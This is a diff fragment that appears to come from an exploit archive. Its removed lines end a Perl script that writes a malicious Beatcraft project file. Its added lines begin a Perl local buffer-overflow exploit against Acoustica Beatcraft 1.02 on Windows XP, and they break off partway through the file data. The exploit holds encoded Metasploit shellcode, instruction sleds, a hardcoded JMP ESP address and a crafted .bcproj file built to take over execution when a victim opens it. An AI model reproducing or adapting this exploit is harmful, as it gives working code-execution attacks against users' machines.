-	"\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x64\x00\x00\x00".
-	"\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xD4\x3F".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00".
-	"\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00".
-	"\x00\x00\xD8\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00".
-	"\x07\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F".
-	"\x00\x00\x00\x00\x00\x00\xDC\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00".
-	"\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00".
-	"\x00\x00\x00\x00\x08\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE0\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65".
-	"\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x02\x00\x00\x00\x01\x00\x00\x00\x09\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
-	"\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE2\x3F\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x0A\x00\x00\x00\x64\x00\x00\x00".
-	"\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xE4\x3F".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x0B\x00\x00\x00".
-	"\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00".
-	"\x00\x00\xE6\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00".
-	"\x0C\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F".
-	"\x00\x00\x00\x00\x00\x00\xE8\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00".
-	"\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00".
-	"\x01\x00\x00\x00\x0D\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEA\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65".
-	"\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x03\x00\x00\x00\x02\x00\x00\x00\x0E\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
-	"\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEC\x3F\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x0F\x00\x00\x00\x64\x00\x00\x00".
-	"\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xEE\x3F".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x62\x73\x65\x71\x24\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x01\x00\x00\x00\x62\x73\x71\x6F\x38\x00\x00\x00\x00\x00\x80\x3F".
-	"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x71\x6F\x38\x00\x00\x00".
-	"\x00\x00\x80\x3F\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\x00\x00\x00\x00\x00\x00\x00\x00".
-	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x65\x71".
-	"\x08\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00";
-
-
-open (MYFILE, '>>POC.bcproj');
-binmode(MYFILE);
-print MYFILE "$tuff";
-close (MYFILE);
-print "Exploit file has been created. ( POC.bcproj )\n";
-
-# milw0rm.com [2008-08-30]
+#!/usr/bin/perl
+#
+# Acoustica Beatcraft (bcproj file) Local BOF Exploit
+# Author: Koshi
+#
+# Date: 08-30-08 ( 0day )
+# Application: Acoustica Beatcraft
+# Version(s): v1.02 Build 19
+# Site: http://acoustica.com/beatcraft/index.htm
+# Tested On: Windows XP SP3 Fully Patched
+#
+# Acoustica Beatcraft contains a buffer prone to exploitation via an
+# overly long string. The buffer contains the "title" of the "instruments"
+# one can insert into a Beatcraft project. This exploit is a bit
+# unstable in the fact that, to properly exploit it, one must open
+# Beatcraft firstly, then proceed to open the exploit file from
+# within Beatcraft. Simply double clicking the file will result
+# in a simple DoS scenario. ( Hopefully I'll fix this soon )
+# My guess as of now is we're not going to have it both ways.
+#
+# gr33tz: Rima my baby, str0ke, breaker_unit, mess'
+#
+
+
+# win32_exec -  EXITFUNC=process CMD=calc.exe Size=165 Encoder=ShikataGaNai http://metasploit.com
+my $shellcode =
+"\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\x1f\xb4\xe6\x18\xb1\x24".
+"\x83\xeb\xfc\x31\x43\x13\x03\x5c\xa7\x04\xed\x9e\x2f\x8c\x0e\x5e".
+"\xb0\x86\x4a\x62\x3b\xe4\x51\xe2\x3a\xfa\xd1\x5d\x25\x8f\xb9\x41".
+"\x54\x64\x0c\x0a\x62\xf1\x8e\xe2\xba\xc5\x08\x56\x38\x05\x5e\xa1".
+"\x80\x4c\x92\xac\xc0\xba\x59\x95\x90\x18\xa6\x9c\xfd\xea\xf9\x7a".
+"\xff\x07\x63\x09\xf3\x9c\xe7\x52\x10\x22\x13\xe7\x34\xaf\xe2\x1c".
+"\xcd\xf3\xc0\xe6\x0d\x3a\xc9\x82\x1a\x7d\xf9\xcf\xdd\x06\xf5\x44".
+"\x9d\xfa\x8e\x2a\x02\xae\x1a\xa2\x32\x5b\x15\xb9\xc3\x2b\x26\xbd".
+"\xc3\xc0\x4f\x81\x9c\xe7\x79\x99\x74\x81\x7e\xda\xb9\xea\x2e\xb4".
+"\x47\xd5\x2d\x37\xd0\x7d\x4f\x3d\x2e\x29\x4f\xa6\x4c\xb4\xc3\x4b".
+"\xbd\x53\x64\xee\xc1";
+
+my $led1 = "A"x110;	# Sled ( \x41 INC ECX )
+my $led2 = "A"x34;	# Sled ( \x41 INC ECX )
+my $buf1 = "A"x179;	# Overflow
+
+my $buff = "".
+	"$buf1".	    # Overflowage...
+	"$led1".	    # Slide on down to the jump
+	"\xeb\x07".	    # Jump NTDLL address
+	"\xed\x1e\x94\x7c". # NTDLL.DLL JMP ESP ( This may need to be changed to a different JMP ESP )
+	"\xeb\x31".	    # Line it up right and land into the sled
+	"$led2".	    # Slip on down to the shellcode
+	"$shellcode";	    # ..to the beat of a different drum.
+
+my $tuff = "".
+	"\x52\x49\x46\x46\xB0\x0F\x00\x00\x62\x65\x61\x74\x62\x70\x72\x6F\x30\x02\x00\x00".
+	"\xCD\xCC\x8C\x3F\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64".
+	"\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x4F\x77\x6E\x65\x72\x5C\x44\x65\x73\x6B".
+	"\x74\x6F\x70\x5C\x70\x6F\x63\x2E\x62\x63\x70\x72\x6F\x6A\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00".
+	"\x62\x6B\x69\x74\x98\x01\x00\x00\x00\x00\x80\x3F\xE8\x2B\x56\x13\x9F\x06\xB1\x4F".
+	"\xB8\x24\x65\xE5\x00\xAB\xB8\xA7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x62\x74\x72\x61".
+	"\x28\x00\x00\x00\xCD\xCC\x8C\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x62\x73\x61\x6D\x9C\x02\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"$buff".
+	"\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x62\x70\x61\x74\xA8\x01\x00\x00\x00\x00\x80\x3F".
+	"\x3C\xF3\x4B\x37\x40\x30\xEC\x4E\xA3\xD7\xB3\x2C\x48\x84\xE5\xAC\x01\x00\x00\x00".
+	"\x04\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
+	"\x62\x73\x73\x65\x0C\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x10\x00\x00\x00".
+	"\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00".
+	"\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00".
+	"\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00".
+	"\x00\x00\xB0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00".
+	"\x02\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F".
+	"\x00\x00\x00\x00\x00\x00\xC0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65\x60\x00\x00\x00".
+	"\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x03\x00\x00\x00\x03\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xC8\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x62\x73\x74\x65".
+	"\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00".
+	"\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xD0\x3F\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x62\x73\x74\x65\x60\x00\x00\x00\x00\x00\x80\x3F\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x64\x00\x00\x00".
+	"\x00\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00\x00\x00\xD4\x3F".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
